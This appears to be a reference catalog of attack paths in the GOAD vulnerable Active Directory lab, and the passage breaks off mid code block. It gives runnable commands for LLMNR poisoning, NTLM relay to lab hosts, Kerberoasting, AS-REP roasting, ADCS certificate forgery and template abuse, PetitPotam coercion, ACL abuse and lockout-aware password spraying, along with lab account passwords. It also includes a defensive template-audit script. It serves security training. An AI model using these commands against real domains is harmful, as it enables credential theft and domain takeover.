GOAD is a vulnerable Active Directory penetration testing lab by Mayfly (Orange Cyberdefense). This document catalogs all known vulnerabilities and attack paths in the lab.
Lab Architecture:
- Two forests, three domains: `sevenkingdoms.local` (root) with child `north.sevenkingdoms.local`, and `essos.local` (separate forest)
- Five Windows servers: DC01 (kingslanding), DC02 (winterfell, child DC), DC03 (meereen), SRV02 (castelblack), SRV03 (braavos)
- Bidirectional forest trust between `sevenkingdoms.local` and `essos.local`
- ADCS is installed on DC01 and SRV03; custom vulnerable certificate templates are published on DC03
GOAD Lab-Specific Vulnerable Configurations: These scheduled tasks and configurations are provisioned by Ansible roles to enable attack scenarios:
| Configuration | Server | User | Frequency | Source | Attack Enabled |
|---|---|---|---|---|---|
| Non-existent share connection | Winterfell | robb.stark | Every 2 minutes | ad/GOAD/scripts/responder.ps1 | LLMNR/NBT-NS Poisoning |
| Non-existent share connection (to Meereen) | Winterfell | eddard.stark (Domain Admin of north) | Every 5 minutes | ad/GOAD/scripts/ntlm_relay.ps1 | NTLM Relay |
| A��S-REP Roastable account | dc02 (Winterfell) | brandon.stark | - | ad/GOAD/scripts/asrep_roasting.ps1 | AS-REP Roasting (north) |
| AS-REP Roastable account | dc03 (Meereen) | missandei | - | ad/GOAD/scripts/asrep_roasting2.ps1 | AS-REP Roasting (essos) |
| SMB Signing disabled | Winterfell | - | - | Server config | NTLM Relay target |
| IIS upload vulnerability | 192.168.56.22 (Castelblack) | - | - | IIS config | Web shell upload |
Key Vulnerable Accounts:
- robb.stark (north) - Local admin on Winterfell, password `sexywolfy` (in rockyou.txt, NetNTLMv2 capture)
- brandon.stark (north) - AS-REP roastable, password: `iseedeadpeople`
- missandei (essos) - AS-REP roastable, password: `fr3edom`; also has GenericAll on khal.drogo
- eddard.stark (north) - Domain Admin (north.sevenkingdoms.local), enables NTLM relay to domain compromise
- samwell.tarly (north) - Password in description field: `Heartsbane`
- hodor (north) - Password equals username: `hodor`
- jon.snow (north) - Kerberoastable (HTTP/thewall SPN), password: `iknownothing`
- khal.drogo (essos) - Local admin on Braavos, MSSQL sysadmin, GenericAll on viserys.targaryen and ESC4 template
- viserys.targaryen (essos) - ManageCA officer (ESC7 abuse path)
- Initial Access & Reconnaissance
- Credential Discovery
- Network Poisoning & Relay Attacks
- Kerberos Attacks
- Active Directory Certificate Services (ADCS) Vulnerabilities
- ACL Abuse & Permission Exploitation
- Delegation Attacks
- MSSQL Exploitation
- Privilege Escalation
- Lateral Movement
- Domain Trust Exploitation
- User-Level Attacks
- CVE Exploits
Vulnerability: NULL session access to SMB services
- Affected Systems: WINTERFELL DC, various servers
- Impact: Unauthenticated user enumeration, group discovery, share access
- Tools: crackmapexec, enum4linux, rpcclient, smbclient
- Exploitation (an empty username and password selects the null session; without `-u '' -p ''` cme does not attempt the enumeration, and rpcclient needs `-c` to run a command non-interactively):
```
cme smb 192.168.56.11 -u '' -p '' --users
rpcclient -U "" -N <target> -c enumdomusers
```
Vulnerability: SMB signing not enforced
- Affected Systems: CASTELBLACK (SRV02), BRAAVOS (SRV03) — both are domain member servers running Windows Server. SMB signing is not required by default on member servers (only on DCs).
- Impact: Enables NTLM relay attacks
- Configuration Issues:
- CASTELBLACK: "signing enabled but not required"
- BRAAVOS: "message signing disabled (dangerous, but default)"
Vulnerability: Critical services accessible without security hardening
- Services Identified:
- DNS (port 53) - Domain enumeration
- Kerberos (port 88) - Ticket-based attacks
- LDAP (ports 389, 636, 3268, 3269) - Directory enumeration
- SMB (port 445) - File share and lateral movement
- RDP (port 3389) - Remote access entry points
- SQL Server (port 1433) - Database attacks
- WinRM (ports 5985-5986) - Remote command execution
Vulnerability: Internal DNS records exposed
- Tools: adidnsdump
- Impact: Discovery of internal hosts and services
Vulnerability: Plaintext passwords stored in user description attribute
- Affected Account: samwell.tarly
- Password: Heartsbane
- Discovery Method: LDAP enumeration, rpcclient
- Impact: Immediate authenticated access
Vulnerability: Insufficient password complexity requirements
- Configuration: Set by the `password_policy` role in `ansible/playbooks/ad-data.yml` against every DC (not domain-specific):
  - `ComplexityEnabled = false` (no complexity requirements)
  - `LockoutThreshold = 5` (5 failed attempts before lockout)
  - `MinPasswordLength = 5` (5-character minimum)
  - `LockoutDuration = 5 minutes`
- Impact: Enables password spraying with short, simple wordlists. The lockout threshold still applies: spray one password per round across all users, read each user's `badPwdCount` first, and leave at least the lockout observation window (`cme smb DC_IP --pass-pol` prints it) between rounds.
Vulnerability: Users with passwords matching their usernames
- Discovered Accounts: `hodor:hodor` (north.sevenkingdoms.local)
- Discovery Method: Password spraying
Vulnerability: Identical passwords used across trusted domains
- GOAD Context: The `sql_svc` service account exists in both `north.sevenkingdoms.local` and `essos.local` with the same password (`YouWillNotKerboroast1ngMeeeeee`). Compromising it in one domain (e.g., via Kerberoasting) yields the credential for the other.
- Impact: Single credential pivots between forests
- Attack Path: Kerberoast `sql_svc` in north → use the cracked password (or pass its NT hash) against `essos.local`
Vulnerability: Broadcast name resolution protocols enabled
- GOAD Context: Winterfell runs a scheduled task as robb.stark every 2 minutes attempting to connect to a non-existent share (`\\Bravos\private`), configured in `ad/GOAD/scripts/responder.ps1`. Because the name does not resolve in DNS, Windows falls back to LLMNR/NBT-NS, which any host on the segment can answer.
- Tool: Responder
- Captured Credentials: robb.stark (NetNTLMv2 hash, crackable with rockyou.txt)
- Exploitation:
```
# Start Responder on the lab network interface
responder -I eth0 -wrf
# Wait up to 2 minutes for robb.stark's scheduled task to fire; Responder logs the NetNTLMv2 hash
# Crack with hashcat
hashcat -m 5600 robb_stark_hash.txt rockyou.txt
# Or with John
john robb_stark_hash.txt --wordlist=rockyou.txt
```
- Result: robb.stark is local admin on Winterfell, which enables further lateral movement
- Impact: Credential capture from network authentication
Vulnerability: Systems accept NTLMv1 authentication
- Configuration: Responder's default `Challenge = 1122334455667788` in `Responder.conf` hands every client the same server challenge, so a NetNTLMv1 response (in particular one sent without ESS) can be looked up in precomputed tables instead of brute-forced
- Requirement: the client must still be willing to send NTLMv1, i.e. `LmCompatibilityLevel` below 3; the default on supported Windows versions sends NTLMv2 only
- Impact: Hashes crackable via online services (crack.sh) or `hashcat -m 5500`
Vulnerability: Unsigned SMB on workstations
- GOAD Context: Winterfell runs a scheduled task as eddard.stark (Domain Admin of north.sevenkingdoms.local) every 5 minutes connecting to a non-existent share on Meereen (`\\Meren\Private`), configured in `ad/GOAD/scripts/ntlm_relay.ps1`. Winterfell itself has SMB signing disabled, so the captured authentication can be relayed back to it.
- Find Unsigned SMB Hosts:
```
cme smb 192.168.56.0/24 --gen-relay-list relay_targets.txt
```
- Attack Chain:
  1. Disable Responder's own SMB and HTTP servers in `/usr/share/responder/Responder.conf` (`SMB = Off`, `HTTP = Off`); otherwise Responder answers the connection itself instead of leaving it to ntlmrelayx
  2. Start Responder to poison LLMNR/NBT-NS: `responder -I eth0 -v`
  3. Relay the captured authentication to unsigned SMB hosts with ntlmrelayx
- Basic Relay (single command):
```
impacket-ntlmrelayx -t 192.168.56.11 -smb2support -c "whoami"
```
- SOCKS Proxy Relay (persistent access):
```
# Start relay with SOCKS
impacket-ntlmrelayx -t 192.168.56.11 -smb2support -socks
# In the ntlmrelayx console, type 'socks' to list active sessions
# Drive any tool through proxychains; the password is ignored because the relayed session is reused
proxychains cme smb 192.168.56.11 -d 'NORTH' -u 'eddard.stark' -p '' --sam
proxychains secretsdump.py 'NORTH/eddard.stark'@192.168.56.11
proxychains lsassy -d NORTH -u eddard.stark -p '' 192.168.56.11
```
- Proxychains Config: Edit `/etc/proxychains4.conf` and change the port to 1080 (ntlmrelayx default) instead of 9050 (Tor default). The domain in the SOCKS commands must match the one shown in the `socks` session list (eddard.stark authenticates as `NORTH`).
- Targets: Winterfell (SMB signing disabled). Check the relay list before relaying: Windows DCs require SMB signing by default, and if winterfell is missing from `relay_targets.txt` the relay must point at the unsigned member servers from the SMB signing section (castelblack, braavos) instead.
- Tools: ntlmrelayx, Responder, proxychains, secretsdump, lsassy
Vulnerability: LDAP signing not enforced + RBCD misconfiguration
- Attack Chain:
- Poison/coerce authentication
- Relay to LDAPS
- Create computer accounts with RBCD permissions
- Impersonate domain admin
- Tools: ntlmrelayx, rbcd.py
Vulnerability: Windows prefers IPv6 over IPv4 by default
- Attack Vector: Respond to DHCPv6 queries with malicious DNS server
- Impact: Redirect WPAD queries, capture credentials
- Tool: mitm6
Vulnerability: NTLM MIC removal bypass
- Attack Chain:
  - Force DC authentication via PrinterBug/PetitPotam
  - Relay SMB-to-LDAPS using the remove-MIC bypass (CVE-2019-1040, "Drop the MIC"; ntlmrelayx `--remove-mic`)
  - Bypass signing requirements
- Requirement: the target must be missing the June 2019 fix for CVE-2019-1040; a patched DC rejects a message whose MIC has been stripped
- Impact: Domain compromise
Vulnerability: Users with "Do not require Kerberos preauthentication" flag
- Affected Accounts:
  - brandon.stark (north.sevenkingdoms.local) - cracked password: `iseedeadpeople`
  - missandei (essos.local) - cracked password: `fr3edom`
- Discovery Methods:
  - PowerView: `Get-DomainUser -PreauthNotRequired -Properties distinguishedname`
  - AD Module: `Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object {$_.DoesNotRequirePreAuth -eq $true}`
  - Impacket: `GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP`
- Exploitation:
```
# Linux - Impacket (the users-file form needs no credentials at all)
GetNPUsers.py north.sevenkingdoms.local/ -usersfile users.txt -dc-ip 192.168.56.11
GetNPUsers.py north.sevenkingdoms.local/brandon.stark -dc-ip 192.168.56.11 -no-pass -format hashcat
# Windows - Rubeus (auto-discovers AS-REP roastable accounts)
Rubeus.exe asreproast /format:hashcat
# Crack the hash
hashcat -m 18200 asrep_hashes.txt wordlist.txt
john asrep_hashes.txt --wordlist=rockyou.txt
```
- Note: Does not increase badPwdCount (no lockout risk). missandei lives in the other forest, so her AS-REP must be requested from the essos DC with `essos.local/`, not from winterfell.
- Offensive Tip: With GenericWrite/GenericAll on a user, you can enable "Do not require Kerberos preauthentication" by setting the `UF_DONT_REQUIRE_PREAUTH` bit (0x400000) in userAccountControl, then AS-REP roast them
Vulnerability: Service accounts with SPNs set
- Affected Accounts:
  - jon.snow (HTTP/thewall.north.sevenkingdoms.local; `constrained_delegation_use_any.ps1` adds a CIFS SPN at provisioning time) - password: `iknownothing`
  - sansa.stark (HTTP/eyrie.north.sevenkingdoms.local) - password: `345ertdfg`
  - sql_svc (MSSQLSvc/castelblack.north.sevenkingdoms.local; MSSQLSvc/braavos.essos.local in essos.local) - password: `YouWillNotKerboroast1ngMeeeeee`
- Tools: GetUserSPNs.py, hashcat (mode 13100)
- Exploitation:
```
GetUserSPNs.py north.sevenkingdoms.local/user:password -dc-ip 192.168.56.11 -request
hashcat -m 13100 tgs_hashes.txt wordlist.txt
```
- Caveat: any domain account can do the requesting. The essos copy of sql_svc needs a second run against the essos DC (or `-target-domain essos.local` over the trust). An account limited to AES comes back as `$krb5tgs$17$`/`$18$` (hashcat 19600/19700), which cracks far more slowly than the RC4 `$23$` form shown here.
Vulnerability: GenericWrite on user objects allows adding SPNs
- Attack Chain:
- Identify users with GenericWrite permissions
- Add SPN to target user account
- Request TGS ticket
- Crack offline
- Tools: bloodyAD, targetedKerberoast.py
Vulnerability: Username validation via Kerberos pre-authentication
- Method: Nmap krb5-enum-users script
- Error Responses:
  - Invalid user: `KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN`
  - Valid user: `KRB5KDC_ERR_PREAUTH_REQUIRED`, or a TGT response when the account has pre-authentication disabled
- Impact: Username enumeration without lockout
Vulnerability: Certificate templates allow requesters to specify Subject Alternative Name
- Requirements:
  - Template allows "Enrollee Supplies Subject" (`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` in msPKI-Certificate-Name-Flag)
  - Client authentication EKU enabled (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose / no EKU)
  - A low-privileged principal has enrollment rights, and the template requires neither manager approval nor authorized signatures
- Exploitation:
```
certipy req -u user@domain -p password -ca CA-NAME -template TEMPLATE -upn administrator@domain
```
- Impact: Request certificates for any user including domain admins
Vulnerability: Certificate templates with "Any Purpose" EKU or no EKU
- Impact: Certificate can be used for authentication, code signing, or any purpose
- Exploitation: Same as ESC1 when the template also lets the enrollee supply the subject; otherwise an Any Purpose certificate satisfies the Certificate Request Agent check, so it can be used for the on-behalf-of enrollment described under ESC3
Vulnerability: Templates with Certificate Request Agent EKU
- Attack Chain:
- Request agent certificate
- Use agent certificate to request certificates on behalf of other users
- Request certificate for domain admin
- Impact: Privilege escalation to domain admin
Vulnerability: GenericWrite/GenericAll permissions on certificate templates
- Attack Chain:
  - Identify writeable certificate templates
  - Modify template settings to enable ESC1
  - Request malicious certificate
- Tools: Certipy, bloodyAD
- Exploitation:
```
# Overwrite the template with an ESC1-vulnerable configuration, saving the original first
certipy template -u user@domain -p password -template TEMPLATE -save-old
# Request a certificate for the target UPN through the now-vulnerable template
certipy req -u user@domain -p password -ca CA-NAME -template TEMPLATE -upn admin@domain
```
- Cleanup: restore the configuration saved by `-save-old` (`TEMPLATE.json`) with `certipy template ... -configuration TEMPLATE.json` once done; the modified template is otherwise left exploitable by anyone
Vulnerability: Compromise of Certificate Authority server or PKI AD objects
Golden Certificate Attack:
- Requirements: CA server compromise (local admin on CA)
- Attack Paths:
  - SCHANNEL: Extract CA cert/key → forge certificate → LDAP shell
  - PKINIT: Extract CA cert/key → forge certificate → Kerberos authentication
- Tools: Certipy, SharpDPAPI
- Exploitation:
```
# Backup the CA certificate and private key (requires admin on the CA)
certipy ca -backup -u user@domain -p password -ca CA-NAME
# Forge an administrator certificate signed with the CA key
certipy forge -ca-pfx ca.pfx -upn administrator@domain -subject 'CN=Administrator'
# Authenticate using the forged certificate
certipy auth -pfx forged.pfx -dc-ip DC_IP
```
- Impact: Forge certificates for any user, persistent domain compromise. A forged certificate never appears in the CA database, so revoking issued certificates does not remove it; only re-keying the CA does.
PKI Object Access Control:
- Vulnerability: Excessive permissions on PKI container objects in AD
- Scenario: If SYSTEM (or compromised principal) has Full Control on parent domain's Public Key Services Container
- Attack Path: Child domain compromise → modify CA objects in parent domain → escalate to parent domain
- Impact: Cross-domain privilege escalation via ADCS infrastructure
Vulnerability: CA configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag
- Impact: Any template can be used to request certificates with arbitrary SANs
- Detection: `certipy find -vulnerable`
- Exploitation: Request a certificate with the `-upn` flag for any template
Vulnerability: ManageCA privileges can be escalated to issue arbitrary certificates
- Requirements: ManageCA privileges on Certificate Authority
- Attack Chain:
  1. Add yourself as officer (ManageCertificates permission):
```
certipy ca -ca 'CA-NAME' -add-officer attacker -u user@domain -p password
```
  2. Enable a vulnerable template (e.g., SubCA, a default template that lets the requester supply the subject but that only Domain Admins may enroll in):
```
certipy ca -ca 'CA-NAME' -enable-template SubCA -u user@domain -p password
```
  3. Request a certificate with the forged UPN (the CA refuses it because of the enrollment rights, but the request stays in the database under a request ID):
```
certipy req -u user@domain -p password -ca CA-NAME -template SubCA -upn administrator@domain
```
  4. Issue the refused request using your officer privileges:
```
certipy ca -ca 'CA-NAME' -issue-request REQUEST_ID -u user@domain -p password
```
  5. Retrieve the issued certificate:
```
certipy req -u user@domain -p password -ca CA-NAME -retrieve REQUEST_ID
```
  6. Authenticate as administrator:
```
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```
- Impact: Domain compromise through arbitrary certificate issuance
Vulnerability: Web enrollment service accepts NTLM authentication without EPA/signing
- Attack Chain:
  - Coerce DC authentication (PetitPotam, Coercer)
  - Relay to ADCS web enrollment (HTTP/HTTPS)
  - Request DC certificate
  - Use certificate for authentication
- Tools: ntlmrelayx, petitpotam, certipy
- Exploitation:
```
# Relay incoming NTLM authentication to the enrollment endpoint; the coerced principal is a
# machine account, so request from a machine template (ntlmrelayx accepts --template)
ntlmrelayx.py -t http://adcs.domain/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Coerce the DC to authenticate to the relay host
python3 PetitPotam.py attacker-ip dc-ip
```
- Caveat: the relay only works while the enrollment site accepts NTLM without Extended Protection for Authentication; HTTPS with EPA required ties the NTLM exchange to the TLS channel and breaks it
- Variant: Kerberos relay with self-coercion via DNS manipulation
Vulnerability: Certificate template with CT_FLAG_NO_SECURITY_EXTENSION (0x00080000) flag
- Prerequisites:
  - GenericWrite on the target account
  - `msPKI-Enrollment-Flag` contains `CT_FLAG_NO_SECURITY_EXTENSION` (issued certificates carry no szOID_NTDS_CA_SECURITY_EXT SID extension)
  - `StrongCertificateBindingEnforcement = 1` (compatibility mode) or `CertificateMappingMethods = 0x04` (UPN mapping)
- Attack Chain:
  1. Add shadow credentials to the target to obtain its NT hash:
```
certipy shadow auto -u attacker@domain -p password -account target
```
  2. Change the target's UPN to the victim's:
```
# Using bloodyAD (--host is required) or a similar LDAP tool
bloodyAD --host DC_IP -u attacker -p password -d domain set object target userPrincipalName -v administrator@domain
```
  3. Request a certificate as the target through the vulnerable template:
```
certipy req -u target@domain -hashes :HASH -ca CA-NAME -template VulnerableTemplate
```
  4. Restore the original UPN (otherwise the target account stays broken and the change is obvious)
  5. Authenticate with the forged certificate
- Impact: Privilege escalation via certificate-based authentication
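The template-level findings above (ESC1 through ESC4 and ESC9) all reduce to a handful of attribute checks on `pKICertificateTemplate` objects, which is what `certipy find -vulnerable` performs. The Python below is an added example, not Certipy's code and not a dump of GOAD's templates: the EKU OIDs and flag bits are the real schema values, the templates in `TEMPLATES` are constructed for the demo, and the ACE model is a simplified `(principal, right)` list standing in for the resolved nTSecurityDescriptor. `remediate` shows the minimum defender-side change for a request-based finding and why an ESC4 write ACE survives it.

```python
from typing import Dict, List, Tuple

# Well-known EKU OIDs and template flag bits (AD CS schema / MS-CRTD); these values are real.
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_PKINIT_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_ANY_PURPOSE}

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000       # msPKI-Enrollment-Flag: no SID extension (ESC9)

LOW_PRIV = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}
WRITE_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "WriteProperty"}


def classify(t: dict) -> List[str]:
    """Return the template-level ESC labels a template satisfies, in numeric order."""
    aces: List[Tuple[str, str]] = t["aces"]
    ekus = set(t.get("ekus", []))
    can_auth = not ekus or bool(ekus & AUTH_EKUS)            # no EKU at all restricts nothing
    needs_approval = bool(t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    needs_signature = t.get("ra_signatures", 0) > 0
    low_priv_enroll = any(p in LOW_PRIV and r == "Enroll" for p, r in aces)
    # every request-based ESC needs: low-priv enrollment, no approval, no co-signature
    open_enroll = low_priv_enroll and not needs_approval and not needs_signature
    supplies_subject = bool(t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    out = []
    if open_enroll and supplies_subject and can_auth:
        out.append("ESC1")
    if open_enroll and (not ekus or EKU_ANY_PURPOSE in ekus):
        out.append("ESC2")
    if open_enroll and EKU_CERT_REQUEST_AGENT in ekus:
        out.append("ESC3")
    if any(p in LOW_PRIV and r in WRITE_RIGHTS for p, r in aces):
        out.append("ESC4")
    if open_enroll and can_auth and t["enrollment_flag"] & CT_FLAG_NO_SECURITY_EXTENSION:
        out.append("ESC9")
    return out


def remediate(t: dict) -> dict:
    """Minimum fix for a request-based finding: require manager approval and stop accepting a
    requester-supplied subject. A write ACE (ESC4) has to be removed from the DACL itself."""
    fixed = dict(t)
    fixed["enrollment_flag"] = t["enrollment_flag"] | CT_FLAG_PEND_ALL_REQUESTS
    fixed["name_flag"] = t["name_flag"] & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed


def _tmpl(name, name_flag=0, enrollment_flag=0, ekus=(), aces=(("Domain Users", "Enroll"),), ra_signatures=0):
    return {"name": name, "name_flag": name_flag, "enrollment_flag": enrollment_flag,
            "ekus": list(ekus), "aces": list(aces), "ra_signatures": ra_signatures}


# Constructed templates for the demo; they are NOT the definitions GOAD publishes on its CAs.
TEMPLATES: Dict[str, dict] = {t["name"]: t for t in [
    _tmpl("ESC1-Test", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, ekus=[EKU_CLIENT_AUTH]),
    _tmpl("Approval-Gated", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
          enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS, ekus=[EKU_CLIENT_AUTH]),
    _tmpl("ESC4-Test", ekus=[EKU_CLIENT_AUTH], aces=[("Domain Users", "Enroll"), ("Domain Users", "WriteDacl")]),
    _tmpl("Agent", ekus=[EKU_CERT_REQUEST_AGENT]),
    _tmpl("AnyPurposeSAN", name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, ekus=[EKU_ANY_PURPOSE]),
    _tmpl("ESC9-Test", enrollment_flag=CT_FLAG_NO_SECURITY_EXTENSION, ekus=[EKU_CLIENT_AUTH]),
    _tmpl("User-Like", ekus=[EKU_CLIENT_AUTH, "1.3.6.1.5.5.7.3.4"]),   # client auth + secure email
]}
```

Read `classify` as the audit checklist: a template is only dangerous when a low-privileged principal can enroll without approval or co-signature, and then the EKU set and the subject flag decide which ESC it is. CA-level flags (ESC6), CA permissions (ESC7) and enrollment endpoints (ESC8, ESC11) are not template properties and are not covered here.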
Vulnerability: Certificate mapping bypass allowing authentication as any user
- Case 1 (`StrongCertificateBindingEnforcement = 0`):
  - Modify target user's UPN to "administrator"
  - Request certificate using target's hash
  - Restore original UPN
  - Authenticate as administrator with certificate
- Case 2 (`CertificateMappingMethods = 0x04`):
  - Modify target UPN to computer account format: `computername$@domain`
  - Request certificate
  - Restore UPN
  - Authenticate via LDAP shell for computer account access
- Requirements: GenericWrite on target account
- Tools: certipy, bloodyAD
Vulnerability: Encryption not enforced for ICPR (MS-ICPR) RPC requests
- Difference from ESC8: Uses RPC instead of HTTP for relay
- Requirements: CA allows RPC connections without encryption enforcement (`IF_ENFORCEENCRYPTICERTREQUEST` not set)
- Attack Chain:
  1. Set up the RPC relay:
```
ntlmrelayx.py -t rpc://CA-IP -rpc-mode ICPR -icpr-ca-name CA-NAME --adcs
```
  2. Coerce DC authentication via RPC:
```
coercer.py -u user -p password -d domain -t DC-IP -l attacker-ip --rpc-mode
```
  3. Certificate issued for the coerced principal
  4. Authenticate using the obtained certificate
- Impact: Domain compromise via RPC-based relay (bypasses HTTP-focused defenses)
Vulnerability: Certificate template with issuance policy linked to privileged group membership
- Scenario: Template allows domain users to enroll, and the issuance policy OID on the issued certificate is linked (via `msDS-OIDToGroupLink` on the OID object) to a privileged group (e.g., "greatmaster" → admin privileges); a Kerberos logon with that certificate adds the group's SID to the PAC
- Detection: Identify templates whose issuance policy OID object carries `msDS-OIDToGroupLink`
- Attack Chain:
  1. Enumerate templates with dangerous issuance policies:
```
certipy find -vulnerable -u user@domain -p password
```
  2. Request a certificate from the vulnerable template:
```
certipy req -u user@domain -p password -ca CA-NAME -template VulnerableTemplate
```
  3. Authenticate and inherit the group privileges:
```
certipy auth -pfx user.pfx -dc-ip DC_IP
```
- Impact: Unintended privilege escalation through certificate issuance policies
Vulnerability: Write access to target's altSecurityIdentities attribute enables certificate mapping
- Requirements: GenericWrite/WriteDacl on the target user object (altSecurityIdentities is an ordinary attribute, so Write-Property on it alone is enough)
- Attack Chain:
  1. Create a machine account with a specific DNS hostname:
```
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Pass123' domain/user:password
# Set dnsHostName for the computer account
```
  2. Request a Machine template certificate for your computer:
```
certipy req -u 'YOURPC$'@domain -p 'Pass123' -ca CA-NAME -template Machine
```
  3. Calculate the X509IssuerSerialNumber mapping string from the certificate:
```
openssl x509 -in cert.pem -noout -issuer -serial
# Format: X509:<I>DC=domain,DC=local,CN=CA-NAME<SR>SERIALNUMBER
# The issuer is the CA's DN in reversed (root-first) RDN order, and the serial number bytes are
# reversed: a serial openssl prints as 12AB34 is written 34AB12 in the <SR> field
```
  4. Modify the target's altSecurityIdentities attribute:
```
# Using ldeep or a similar LDAP tool
ldeep ldap -u user -p password -d domain modify "CN=target,CN=Users,DC=domain,DC=local" \
    add altSecurityIdentities "X509:<I>DC=domain,DC=local,CN=CA-NAME<SR>SERIAL"
```
  5. Authenticate as the target using your certificate via PKINIT:
```
certipy auth -pfx yourpc.pfx -dc-ip DC_IP -domain domain.local
```
- Impact: Account takeover via certificate mapping without password knowledge
Vulnerability: Certificate Request Agent application policy enables delegation abuse
- Requirements: A schema version 1 template (e.g., WebServer) in which a low-privileged user can enroll and supply the subject. The Certificate Request Agent application policy is injected by the requester and honoured by the CA; it does not have to be present on the template (ESC15, "EKUwu", CVE-2024-49019). A template that already carries the agent EKU is the ESC3 case above.
- Attack Chain:
  1. Request a certificate while injecting the Certificate Request Agent application policy (recent certipy releases expose this as `-application-policies`):
```
certipy req -u user@domain -p password -ca CA-NAME -template WebServer -application-policies 'Certificate Request Agent'
```
  2. Use the resulting agent certificate to request a certificate on behalf of administrator:
```
certipy req -u user@domain -p password -ca CA-NAME -template User \
    -on-behalf-of 'domain\\administrator' -pfx agent.pfx
```
  3. Authenticate as administrator:
```
certipy auth -pfx administrator.pfx -dc-ip DC_IP
```
- Impact: Privilege escalation to any user including domain admin
- Patched: November 12, 2024
Vulnerability: Computer account DNS hostname spoofing
- Attack Chain:
  - Create computer account (MAQ=10 by default)
  - Set dNSHostName to match the domain controller (clear the account's host-based servicePrincipalName values first; the DC enforces SPN uniqueness and rejects the write otherwise)
  - Request computer certificate
  - Certificate issued for DC identity
  - Authenticate as DC
- Tools: Certipy, impacket
- Impact: Domain compromise via DC impersonation (Certifried, CVE-2022-26923, fixed by the May 2022 updates: a patched CA embeds the requester's SID in the certificate, so the hostname alone no longer maps to the DC)
Vulnerability: GenericWrite/GenericAll on user/computer objects
- Attack Chain:
  - Add KeyCredentialLink to target account
  - Generate PKINIT certificate
  - Request TGT using certificate
  - Authenticate as target
- Tools: Pywhisker, Whisker
- Exploitation:
```
pywhisker.py -d domain -u user -p password --target targetuser --action add
```
- Caveat: PKINIT must be available, i.e. the DC holds a certificate usable for Kerberos (an enterprise CA in the domain); without it the TGT request fails with `KDC_ERR_PADATA_TYPE_NOSUPP`. Remove the added KeyCredential afterwards (`--action remove` with the DeviceID printed at add time) rather than leaving a second login key on the account.
Vulnerability: Reset password permission on user objects
- Impact: Direct password reset without knowledge of current password
- Warning: Should not be used in real pentests (disruptive)
- Tools: bloodyAD, net rpc password
Vulnerability: Full write access to user object attributes
- Attack Vectors:
- Targeted Kerberoasting: Add SPN → request TGS → crack offline
- Shadow Credentials: Add msDS-KeyCredentialLink → PKINIT authentication
- LogonScript modification: Set scriptpath → execute code on logon
- ProfilePath manipulation: Force NetNTLMv2 authentication capture
- Tools: bloodyAD, PowerView, targetedKerberoast.py
Vulnerability: Modify access control entries on objects
- Attack Chain:
  - Identify WriteDacl permission
  - Grant additional rights (e.g., FullControl)
  - Execute further attacks
- Tools: dacledit.py, PowerView
- Exploitation:
```
dacledit.py -action write -rights FullControl -principal attacker -target-dn "CN=Target,DC=domain" domain/user:password
```
Vulnerability: Change ownership of group objects
- Attack Chain:
- Change group ownership to attacker-controlled account
- Modify DACL to grant full control
- Add members to privileged group
- Impact: Group membership manipulation
Vulnerability: Permission to add members to groups without approval
- Common Targets: Domain Admins, high-privilege groups
- Tools: net rpc group addmem, bloodyAD
Vulnerability: Complete control over user objects
- Capabilities:
- Password changes
- Shadow credentials
- Full account takeover
- Impact: Immediate privilege escalation
Vulnerability: Complete control over computer objects
- Attack Vectors:
- Shadow credentials for machine account
- RBCD configuration
- LAPS password reading (if configured)
- Impact: System-level access to target computer
Vulnerability: Write permissions on Group Policy Objects
- Attack Chain:
  - Identify writable GPO
  - Inject scheduled task executing arbitrary code as SYSTEM
  - Wait for the GPO refresh (90 minutes plus a random offset on members, 5 minutes on DCs) or force it with `gpupdate /force` on a host you already control
- Tools: SharpGPOAbuse, bloodyAD
- Impact: Code execution as SYSTEM on all computers in GPO scope
Vulnerability: Read access to ms-Mcs-AdmPwd attribute
- Requirements: Proper permissions on computer objects
- Tools: crackmapexec, ldapsearch, bloodyAD
- Impact: Local administrator password disclosure
Sevenkingdoms.local killchain:
Tywin
→ Jaime (ForceChangePassword)
→ Joffrey (GenericWrite/Kerberoasting)
→ Tyron (Shadow Credentials)
→ Small Council group (AddSelf)
→ DragonStone group (AddMember)
→ Kingsguard group (WriteOwner)
→ Stannis user (GenericAll)
→ Kingslanding DC (GenericAll on Computer/RBCD)
Vulnerability: Accounts configured with unconstrained delegation cache all TGTs
- Default Configuration: All domain controllers have unconstrained delegation
- Attack Chain:
  - Identify unconstrained delegation accounts (BloodHound query: `unconstraineddelegation:true`)
  - Compromise an account (usually a server) with unconstrained delegation
  - Coerce DC authentication (PetitPotam, Coercer, PrinterBug)
  - Extract the cached DC TGT from memory
  - Use the TGT for DCSync
- Tools: Rubeus, klist, Coercer, secretsdump
- Exploitation:
```
# Windows: list cached tickets, then dump the DC machine account's TGT
